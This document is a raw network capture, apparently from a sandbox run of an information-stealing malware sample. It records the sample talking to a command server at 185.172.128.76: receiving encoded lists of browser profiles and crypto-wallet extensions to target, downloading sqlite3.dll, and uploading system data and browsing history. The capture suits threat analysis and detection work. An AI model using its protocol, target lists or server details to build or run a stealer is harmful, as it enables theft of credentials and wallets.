MDA1Yzc4ZGYyMzQ5MWVlMTNjNDg1NDc3Mzk4OGFmODhjN2NkMzg2OGY5NWViNDJlYjhkYmU3OGNkYWFlMWVlMDFmODkxODVhfGhlcjdoNDhyfGVyNGg0ZThyNC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
Apr 27, 2024 00:46:05.537147045 CEST	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJEHJJDAAAKEBGCFCAA Host: 185.172.128.76 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHJEHJJDAAAKEBGCFCAAContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------GHJEHJJDAAAKEBGCFCAAContent-Disposition: form-data; name="message"browsers------GHJEHJJDAAAKEBGCFCAA--
Apr 27, 2024 00:46:05.819614887 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxV [TRUNCATED]
Apr 27, 2024 00:46:05.819751978 CEST	427	IN	Data Raw: 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 39 Data Ascii: 21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQ
Apr 27, 2024 00:46:05.948627949 CEST	468	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHD Host: 185.172.128.76 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 2d 2d 0d 0a Data Ascii: ------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="message"plugins------JDGCGDBGCAAEBFIECGHD--
Apr 27, 2024 00:46:06.230161905 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5416 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdh [TRUNCATED]
Apr 27, 2024 00:46:06.230222940 CEST	1289	IN	Data Raw: 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 Data Ascii: GxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBk
Apr 27, 2024 00:46:06.230249882 CEST	1289	IN	Data Raw: 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c Data Ascii: FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8M
Apr 27, 2024 00:46:06.230303049 CEST	1289	IN	Data Raw: 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 Data Ascii: wYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY2
Apr 27, 2024 00:46:06.230318069 CEST	456	IN	Data Raw: 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57 Data Ascii: YmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHx
Apr 27, 2024 00:46:07.447657108 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECF Host: 185.172.128.76 Content-Length: 7655 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:46:07.447658062 CEST	7655	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 Data Ascii: ------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Apr 27, 2024 00:46:07.759968996 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:46:08.643484116 CEST	93	OUT	GET /15f649199f40275b/sqlite3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 00:46:08.925554037 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:08 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
Apr 27, 2024 00:46:08.925597906 CEST	1289	IN	Data Raw: 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 Data Ascii: @B/81s:<R@B/92P @B
Apr 27, 2024 00:46:08.925651073 CEST	1289	IN	Data Raw: 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89 Data Ascii: +C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$
Apr 27, 2024 00:46:08.925689936 CEST	1289	IN	Data Raw: 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 9e ec 61 89 e5 53 8b 18 8a Data Ascii: ]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$1U
Apr 27, 2024 00:46:08.925734997 CEST	1289	IN	Data Raw: 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f c0 1f 00 c1 e1 0e 09 f1 f6 c1 80 75 Data Ascii: LpuBpuBxMMuMZ2Mx]uZxu
Apr 27, 2024 00:46:12.791568995 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAA Host: 185.172.128.76 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:46:13.099715948 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:46:13.189224005 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCFCAAAAFBAKEBFBAKK Host: 185.172.128.76 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:46:14.035733938 CEST	1289	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCFCAAAAFBAKEBFBAKK Host: 185.172.128.76 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 61 47 6c 7a 64 47 39 79 65 56 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------CFCFCAAAAFBAKEBFBAKKContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------CFCFCAAAAFBAKEBFBAKKContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------CFCFCAAAAFBAKEBFBAKKContent-Disposition: form-data; name="file"aHR0cHM6Ly9nby5taWNyb3NvZnQuY29tL2Z3bGluay8/TGlua0lkPTIxMDYyNDMKaHR0cHM6Ly9nby5taWNyb3NvZnQuY29tL2Z3bGluay8/bGlua2lkPTg1MTU0NgpodHRwczovL3N1cHBvcnQubWljcm9zb2Z0LmNvbS9lbi11cy9vZmZpY2UvN2Q0ODI4NWItMjBlOC00YjliLTkxYWQtMjE2ZTM0MTYzYmFkP3d0Lm1jX2lkPWVudGVycGsyMDE2JnVpPWVuLXVzJnJzPWVuLXVzJmFkPXVzCmh0dHBzOi8vc3VwcG9ydC5taWNyb3NvZnQuY29tL2VuLXVzL29mZmljZS85NGJhMmUwYi02MzhlLTRhOTItODg1Ny0yY2I1YWMxZDhlMTc/dWk9ZW4tdXMmcnM9ZW4tdXMmYWQ9dXMKaHR0cHM6Ly9zdXBwb3J0Lm1pY3Jvc29mdC5jb20vZW4tdXMvb2ZmaWNlL2V4YW1wbGVzLW9mLW9mZmljZS1wcm9kdWN0LWtleXMtN2Q0ODI4NWItMjBlOC00YjliLTkxYWQtMjE2ZTM0MTYzYmFkP3d0Lm1jX2lkPWVudGVycGsyMDE2JnVpPWVuLXVzJnJzPWVuLXVzJmFkPXVzCmh0dHBzOi8vc3VwcG9yd [TRUNCATED]
Apr 27, 2024 00:46:14.343696117 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:46:14.615041971 CEST	560	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJEHJJDAAAKEBGCFCAA Host: 185.172.128.76 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a [TRUNCATED] Data Ascii: ------GHJEHJJDAAAKEBGCFCAAContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------GHJEHJJDAAAKEBGCFCAAContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------GHJEHJJDAAAKEBGCFCAAContent-Disposition: form-data; name="file"------GHJEHJJDAAAKEBGCFCAA--
Apr 27, 2024 00:46:14.916677952 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
